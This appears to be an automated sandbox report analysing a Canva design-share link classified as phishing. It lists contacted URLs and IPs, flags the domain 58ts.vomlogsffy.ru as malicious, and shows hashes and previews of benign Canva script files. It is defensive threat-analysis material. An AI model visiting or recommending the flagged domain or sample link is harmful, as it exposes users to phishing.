                                                                    https://sb.scorecardresearch.com/p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=1610630260false
                                                                      high
                                                                      https://static.canva.com/web/42edacda53f68fee.ltr.cssfalse
                                                                        high
                                                                        https://static.canva.com/web/a539f22cb4b4cc9e.vendor.jsfalse
                                                                          high
                                                                          https://static.canva.com/web/19jbs9.2447b447994aff36.ltr.cssfalse
                                                                            high
                                                                            https://static.canva.com/web/4e14dd1571e90f68.ltr.cssfalse
                                                                              high
                                                                              https://font-public.canva.com/YAFdJjTk5UU/0/CanvaSans-Medium.95291d1cd5c6185e00ba590.c69c23593c9bd5705c7780a200f2a6db.woff2false
                                                                                high
                                                                                https://static.canva.com/web/76d8b06612b94585.vendor.jsfalse
                                                                                  high
                                                                                  https://font-public.canva.com/YAFdJjTk5UU/0/CanvaSans-Bold13644182954117137290.33696.33696a29f45c1b554a4c12443b998d21.woff2false
                                                                                    high
                                                                                    https://font-public.canva.com/_fb/s/41d36c36b634199c0ebf5e807fda38d0.cssfalse
                                                                                      high
                                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                                      https://font-public.canva.com/_fb/0/56.woff2)chromecache_95.2.drfalse
                                                                                        high
                                                                                        https://stats.g.doubleclick.net/g/collectchromecache_171.2.dr, chromecache_112.2.drfalse
                                                                                          high
                                                                                          https://font-public.canva.com/_fb/0/24.woff)chromecache_95.2.drfalse
                                                                                            high
                                                                                            https://www.redditstatic.com/ads/pixel.jschromecache_149.2.dr, chromecache_152.2.drfalse
                                                                                              high
                                                                                              https://www.canva-staging.com/design/chromecache_102.2.dr, chromecache_136.2.drfalse
                                                                                                unknown
                                                                                                https://font-public.canva.com/_fb/0/17.woff2)chromecache_95.2.drfalse
                                                                                                  high
                                                                                                  https://font-public.canva.com/_fb/0/04.ttf)chromecache_95.2.drfalse
                                                                                                    high
                                                                                                    https://font-public.canva.com/_fb/0/31.woff)chromecache_95.2.drfalse
                                                                                                      high
                                                                                                      https://font-public.canva.com/_fb/0/04.woff)chromecache_95.2.drfalse
                                                                                                        high
                                                                                                        https://font-public.canva.com/_fb/0/71.woff)chromecache_95.2.drfalse
                                                                                                          high
                                                                                                          https://font-public.canva.com/_fb/0/11.woff)chromecache_95.2.drfalse
                                                                                                            high
                                                                                                            https://font-public.canva.com/_fb/0/02.ttf)chromecache_95.2.drfalse
                                                                                                              high
                                                                                                              https://font-public.canva.com/_fb/0/2E.ttf)chromecache_95.2.drfalse
                                                                                                                high
                                                                                                                https://cdn.iframe.lychromecache_102.2.dr, chromecache_136.2.drfalse
                                                                                                                  high
                                                                                                                  https://font-public.canva.com/_fb/0/76.ttf)chromecache_95.2.drfalse
                                                                                                                    high
                                                                                                                    https://tally.so/chromecache_102.2.dr, chromecache_136.2.drfalse
                                                                                                                      high
                                                                                                                      http://tally.so/chromecache_102.2.dr, chromecache_136.2.drfalse
                                                                                                                        high
                                                                                                                        https://font-public.canva.com/_fb/0/16.woff)chromecache_95.2.drfalse
                                                                                                                          high
                                                                                                                          https://vimeo.com/chromecache_102.2.dr, chromecache_136.2.drfalse
                                                                                                                            high
                                                                                                                            https://font-public.canva.com/_fb/0/0B.woff2)chromecache_95.2.drfalse
                                                                                                                              high
                                                                                                                              https://font-public.canva.com/_fb/0/61.woff2)chromecache_95.2.drfalse
                                                                                                                                high
                                                                                                                                https://font-public.canva.com/_fb/0/28.woff2)chromecache_95.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://font-public.canva.com/_fb/0/72.woff)chromecache_95.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://font-public.canva.com/_fb/0/7E-quadratic.woff)chromecache_95.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://font-public.canva.com/_fb/0/31.ttf)chromecache_95.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://font-public.canva.com/_fb/0/24.woff2)chromecache_95.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://font-public.canva.com/_fb/0/56.woff)chromecache_95.2.drfalse
                                                                                                                                            high
                                                                                                                                            https://font-public.canva.com/_fb/0/2D.woff2)chromecache_95.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://px.ads.linkedin.com/collect/?pid=chromecache_149.2.dr, chromecache_152.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://font-public.canva.com/_fb/0/4C.woff2)chromecache_95.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://font-public.canva.com/_fb/0/29.woff)chromecache_95.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://font-public.canva.com/_fb/0/47.woff2)chromecache_95.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=1chromecache_148.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://font-public.canva.com/_fb/0/7E.otf)chromecache_95.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://font-public.canva.com/_fb/0/6F.woff)chromecache_95.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://api-gw.metadata.iochromecache_98.2.dr, chromecache_157.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://font-public.canva.com/_fb/0/3D.ttf)chromecache_95.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://font-public.canva.com/_fb/0/02.woff2)chromecache_95.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://font-public.canva.com/_fb/0/17.woff)chromecache_95.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://font-public.canva.com/_fb/0/60.ttf)chromecache_95.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://canva-embed.comchromecache_102.2.dr, chromecache_136.2.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://quilljs.com/chromecache_103.2.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://font-public.canva.com/_fb/0/47.ttf)chromecache_95.2.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://font-public.canva.com/_fb/0/28.ttf)chromecache_95.2.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://font-public.canva.com/_fb/0/2E.woff)chromecache_95.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://font-public.canva.com/_fb/0/05.woff)chromecache_95.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://font-public.canva.com/_fb/0/39.woff2)chromecache_95.2.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://font-public.canva.com/_fb/0/09.ttf)chromecache_95.2.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://font-public.canva.com/_fb/0/6F.ttf)chromecache_95.2.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://youtu.be/chromecache_102.2.dr, chromecache_136.2.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://font-public.canva.com/_fb/0/70.woff2)chromecache_95.2.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://font-public.canva.com/_fb/0/26.ttf)chromecache_95.2.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://font-public.canva.com/_fb/0/75.woff2)chromecache_95.2.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://font-public.canva.com/_fb/0/76.woff2)chromecache_95.2.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://font-public.canva.com/_fb/0/12.ttf)chromecache_95.2.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://font-public.canva.com/_fb/0/31.woff2)chromecache_95.2.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://font-public.canva.com/_fb/0/32.woff2)chromecache_95.2.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://vimeo.com/album/chromecache_102.2.dr, chromecache_136.2.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://font-public.canva.com/_fb/0/3D.woff2)chromecache_95.2.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://font-public.canva.com/_fb/0/27.ttf)chromecache_95.2.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://youtu.be/chromecache_102.2.dr, chromecache_136.2.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://font-public.canva.com/_fb/0/0A.woff)chromecache_95.2.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://font-public.canva.com/_fb/0/23.woff)chromecache_95.2.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://font-public.canva.com/_fb/0/7E.woff2)chromecache_95.2.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://font-public.canva.com/_fb/0/03.woff)chromecache_95.2.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://font-public.canva.com/_fb/0/2D.woff)chromecache_95.2.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://font-public.canva.com/_fb/0/60.woff)chromecache_95.2.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://font-public.canva.com/_fb/0/32.woff)chromecache_95.2.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://font-public.canva.com/_fb/0/09.woff2)chromecache_95.2.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://github.com/getsentry/sentry-javascriptchromecache_108.2.dr, chromecache_158.2.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://font-public.canva.com/_fb/0/0C.ttf)chromecache_95.2.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://codesandbox.io/chromecache_102.2.dr, chromecache_136.2.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://font-public.canva.com/_fb/0/55.woff)chromecache_95.2.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://font-public.canva.com/_fb/0/56.ttf)chromecache_95.2.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://logx.optimizely.com/v1/eventschromecache_123.2.dr, chromecache_100.2.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://vimeo.com/channels/chromecache_102.2.dr, chromecache_136.2.drfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://font-public.canva.com/_fb/0/75.ttf)chromecache_95.2.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://font-public.canva.com/_fb/0/75.woff)chromecache_95.2.drfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://font-public.canva.com/_fb/0/16.otf)chromecache_95.2.drfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                    172.217.19.228
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    142.250.181.70
                                                                                                                                                                                                                                                    ad.doubleclick.netUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    172.217.17.66
                                                                                                                                                                                                                                                    googleads.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    172.67.176.26
                                                                                                                                                                                                                                                    58ts.vomlogsffy.ruUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                    18.161.69.117
                                                                                                                                                                                                                                                    sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                    13.226.2.3
                                                                                                                                                                                                                                                    d1w725hft9421a.cloudfront.netUnited States
                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                    142.250.181.132
                                                                                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    104.16.102.112
                                                                                                                                                                                                                                                    static.canva.comUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    216.239.34.21
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    216.239.38.21
                                                                                                                                                                                                                                                    ct.canva.comUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    99.83.205.94
                                                                                                                                                                                                                                                    p.tvpixel.comUnited States
                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                    35.190.80.1
                                                                                                                                                                                                                                                    a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    151.101.194.137
                                                                                                                                                                                                                                                    code.jquery.comUnited States
                                                                                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                                                                                    104.16.79.73
                                                                                                                                                                                                                                                    static.cloudflareinsights.comUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    104.26.12.205
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    18.161.69.30
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                    104.16.103.112
                                                                                                                                                                                                                                                    www.canva.comUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    54.171.122.26
                                                                                                                                                                                                                                                    spdc-global.pbp.gysm.yahoodns.netUnited States
                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                                                                                    142.250.181.34
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    54.246.144.89
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                    75.2.57.54
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                    34.120.195.249
                                                                                                                                                                                                                                                    o13855.ingest.sentry.ioUnited States
                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    172.67.74.152
                                                                                                                                                                                                                                                    api.ipify.orgUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                                    192.168.2.4
                                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                    Analysis ID:1578567
                                                                                                                                                                                                                                                    Start date and time:2024-12-19 22:26:18 +01:00
                                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                    Overall analysis duration:0h 3m 10s
                                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                                    Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                    Sample URL:https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a
                                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                    Number of analysed new started processes analysed:8
                                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                                    Classification:mal60.phis.win@17/125@70/25
                                                                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.19.206, 64.233.162.84, 142.250.181.142, 23.193.114.26, 216.58.208.232, 192.229.221.95, 172.217.17.34, 142.250.181.106, 172.217.19.234, 172.217.17.42, 172.217.17.74, 142.250.181.42, 216.58.208.234, 172.217.21.42, 172.217.19.10, 142.250.181.138, 172.217.19.202, 142.250.181.74, 172.217.17.35, 23.218.208.109, 20.12.23.50, 13.107.246.63
                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, www.googleadservices.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, www.googletagmanager.com, update.googleapis.com, clients.l.google.com
                                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                    • VT rate limit hit for: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a
                                                                                                                                                                                                                                                    No simulations
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2156)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):17275
                                                                                                                                                                                                                                                    Entropy (8bit):5.434407663185445
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:mnJVAX2+03OhWO1L1Bn4ad1ju+2gnRnK+NWVmMNEDBTG6GiAjqWXHQuI2qP32a:m8G+03OhWO1L1yad1ju+3RnDNWVBNEFz
                                                                                                                                                                                                                                                    MD5:D413EBCA508B7B61807EE983A30203D3
                                                                                                                                                                                                                                                    SHA1:EAEBEDD510A1574670108F01A92FC908406623D9
                                                                                                                                                                                                                                                    SHA-256:EE9760E600529C567D7C570542EB631833AE7F07D1A6D713F7B94CB8DB788345
                                                                                                                                                                                                                                                    SHA-512:F05999BBC94B80744E78BD7A45970CEB0F5C2CF15CD900899912627E63345933D999972787A354033079648B450485319FB762FE9DDDEBBF43099B31BFFCD699
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[2395],{../***/ 284457:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(577033);__web_req__(153325);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var S=__c.S;var T=__c.T;var G=__c.G;.var wdb=function(a,b,c){return async(d,e,f)=>{let g,h={};Array.isArray(e)?g=e:h=__c.Sd(e);null==g&&null!=f&&(g=f);return __c.ae(a,b,d,h,()=>c(...g))}},Adb=async function(a,b){const c=__c.Ee(__c.Ce([xdb,"create"])),[d,{Rsa:e}]=await Promise.all([a.Ol.post(c,ydb.Pa(b),{yn:"recordanalyticsevent"}),__webpack_require__.me(577033).then(()=>({Rsa:zdb}))]);return e.Ra(d)},Ddb=async function(a,b){const c=__c.Ee(__c.Ce([xdb,"createBatch"])),[d,{Qsa:e}]=await Promise.all([a.Ol.post(c,Bdb.Pa(b),{yn:"recordanalyticseventbatch"}),.__webpack_require__.me(577033).then(()=>({Qsa:Cdb}
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65455)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):205707
                                                                                                                                                                                                                                                    Entropy (8bit):5.28145887499295
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:eRYYsuOFvB+ZC2oheW9E4QCuXU+inBcqLRjPV:NFvB+E2fWa4QlE3BzVV
                                                                                                                                                                                                                                                    MD5:2A1F2D039CB106B389C63AA919CB4DB8
                                                                                                                                                                                                                                                    SHA1:4573C91E494C3F4FDFD63D9746DF8D09ABB72BCA
                                                                                                                                                                                                                                                    SHA-256:21970317BF4C176087640D7E46BBEB1C59B5C2BFB67AFCB392F3FF1E790DEAE5
                                                                                                                                                                                                                                                    SHA-512:C2ABFC64A41B0BB2F0E2202E624A6EA02452699BBB91E684A85B59CC6CA0D2BA44F5537549BDF71F875B178F1531F55BB92A05235464EA882929DB95A7BB612D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:/*! For license information please see 76d8b06612b94585.vendor.js.LICENSE.txt */."use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[2653],{286447:(e,t,n)=>{n.d(t,{Q:()=>a});var r=n(239412);function a(e){var t=e.children,n=e.render;t&&n&&console.error("MobX Observer: Do not use children and render in the same time in `Observer`");var a=t||n;return"function"!=typeof a?null:(0,r.S)(a)}a.displayName="Observer"},225881:(e,t,n)=>{n.d(t,{DT:()=>o.D,FY:()=>o.F,Pi:()=>u.P,Qj:()=>s.Q,fv:()=>c.f,jd:()=>l.O});n(828378);var r,a=n(898793),i=n(256727),o=(n(239412),n(831874)),l=n(609121),u=n(749586),s=n(286447),c=n(354621);n(57211),n(176915);(0,i.z0)(a.m);r=l.O.finalizeAllImmediately},749586:(e,t,n)=>{n.d(t,{P:()=>d});var r,a,i=n(875604),o=n(831874),l=n(239412),u="function"==typeof Symbol&&Symbol.for,s=null!==(a=null===(r=Object.getOwnPropertyDescriptor((function(){}),"name"))||void 0===r?void 0:r.configurable)&&void 0!==a&&a,c=u?Symbol.for("react.forward_ref"):"function
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (563)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):1435612
                                                                                                                                                                                                                                                    Entropy (8bit):5.624486605961852
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:jXgpO95uOTk+gcn/VlyWw4vnHM3TmhfO7qv5AAzEV0a8EjtiFUTNEpv7XZx5qIK6:7D95uOTk+gcnNlyBKnHM3TmhfO7qv5AW
                                                                                                                                                                                                                                                    MD5:CAA1ECECE273993811877D1207762A37
                                                                                                                                                                                                                                                    SHA1:26CF34C793B87D38431C6ABBEEA18B878ECC4ABF
                                                                                                                                                                                                                                                    SHA-256:F6D37B4CCEE10BB3B4F1024188E43D5BEFED2450052602DDA0E06A66AB653E64
                                                                                                                                                                                                                                                    SHA-512:5856EB3FCF3C28846ECA2F6ECBC247C5D08C2C1238135778D409589A2EAECB9D25A0B02E692FCD6C9C1B27685A62D51D75FD038E6C07294726538F19332CDA21
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/19jbs9.7484ddd0951f6659.js
                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1389],{../***/ 813110:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var jM;var rJ;var EW;var hW;var gW;var YV;var Sy;var BU;var uU;var rU;var xU;var uu;var Ut;var Yt;var Va;var IT;var KO;var ba;var gP;var LO;var MO;var CO;var IO;var FO;var HO;var E;var DO;var T;var Qa;var hb;var Ra;var AO;var BO;var EO;var S;var C;var JO;var Ua;var Ta;var U;var G;var ib;var OM;var Ee;var EM;var Ce;var oK;var Cs;var xJ;var Bu;var Vh;var tC;var KG;var ys;var rE;var nb;var YD;var Ox;var gx;var ek;var L;var Ac;var oC;var vk;var GA;var xB;var Rs;var Fc;var ms;var Ks;var Ms;var sy;var ry;.var oy;var jy;var jw;var Eb;var vv;var tv;var sv;var hv;var Ou;var Hu;var wu;var
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (10099)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):10359
                                                                                                                                                                                                                                                    Entropy (8bit):4.826967222214678
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:FFS+oMcpO2BMKGwLsreI0keXg6moYyfJWh:S+oMz2BMKGwLsreI0keXg6moYkQ
                                                                                                                                                                                                                                                    MD5:4EB0CC037AA215C5FA2EB3C1B342613D
                                                                                                                                                                                                                                                    SHA1:97D135C19209077C0335065F35D53FFFC62CAA88
                                                                                                                                                                                                                                                    SHA-256:E8FB139770EC251E750403322D40DB96C027B9FEB48F4489B76A735F9F0869E5
                                                                                                                                                                                                                                                    SHA-512:270302A621DD93DE4CA144DAB5F699270B2DCDE0E759FBD63098B09D2C597CF9A07827B8CAF40343E38D3108C8CBF1EDEF6AF44E6944FA0BD99D8467A5D2DD56
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/a0684b0780c739e9.vendor.ltr.css
                                                                                                                                                                                                                                                    Preview:/*!. * Quill Editor v2.0.0-dev.46. * https://quilljs.com/. * Copyright (c) 2014, Jason Chen. * Copyright (c) 2013, salesforce.com. */.ql-container{box-sizing:border-box;font-family:Helvetica,Arial,sans-serif;font-size:13px;height:100%;margin:0;position:relative}.ql-container.ql-disabled .ql-tooltip{visibility:hidden}.ql-container:not(.ql-disabled) li[data-list=checked]>.ql-ui,.ql-container:not(.ql-disabled) li[data-list=unchecked]>.ql-ui{cursor:pointer}.ql-clipboard{height:1px;left:-100000px;overflow-y:hidden;position:absolute;top:50%}.ql-clipboard p{margin:0;padding:0}.ql-editor{word-wrap:break-word;box-sizing:border-box;counter-reset:list-0 list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9;height:100%;line-height:1.42;outline:none;overflow-y:auto;padding:12px 15px;tab-size:4;-moz-tab-size:4;text-align:left;white-space:pre-wrap}.ql-editor>*{cursor:text}.ql-editor blockquote,.ql-editor h1,.ql-editor h2,.ql-editor h3,.ql-editor h4,.ql-editor h5,.ql-editor h6,.ql-editor ol,.
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (65386), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):442051
                                                                                                                                                                                                                                                    Entropy (8bit):3.3113465215850812
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:3ktYmG/kw9ZM8oHVO5V9omkktYmG/kw9ZM8oHVO5V9oalrUlrL:3IYR/kw9q8XgIYR/kw9q8XB2Z
                                                                                                                                                                                                                                                    MD5:B02A9CB66AF7E083A749FE228C882C01
                                                                                                                                                                                                                                                    SHA1:0D3678D1962DFA6DD8B23FB369F32376CC8FBCBB
                                                                                                                                                                                                                                                    SHA-256:F8DD1F4EBBB52AB593EC8F462123523E1C7872B1F83F3BD86E9D30D65945D79D
                                                                                                                                                                                                                                                    SHA-512:22F9A72B1462C9061B4D2A1B06BA54C4F3D740CE2E68A3FDB2A632266F6DA75BBB4B5A75094A285CB1CFF285ABE4A672325638301BF16847DD4C8F95BE2C7EB7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
